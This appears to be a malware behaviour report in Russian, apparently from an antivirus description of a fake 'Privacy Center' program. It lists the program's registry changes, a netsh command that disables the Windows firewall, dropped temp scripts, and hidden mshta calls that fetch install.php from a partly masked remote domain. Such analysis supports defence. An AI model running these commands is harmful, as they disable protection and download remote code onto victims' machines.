Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode mode=DISABLE
- %TEMP%\~c7c1.bat
- %TEMP%\~d115.js
- DNS ASK we#####ers-paradise.com
- DNS ASK ue####f5myqdl.cn
- ClassName: 'TForm1' WindowName: 'Privacy Center'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\~D115.js" crossales
- '%WINDIR%\syswow64\mshta.exe' http://we#####ers-paradise.com/install.php?id##########' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\~C7C1.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\~D115.js" crossales' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://we#####ers-paradise.com/install.php?id##########
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\~C7C1.bat" "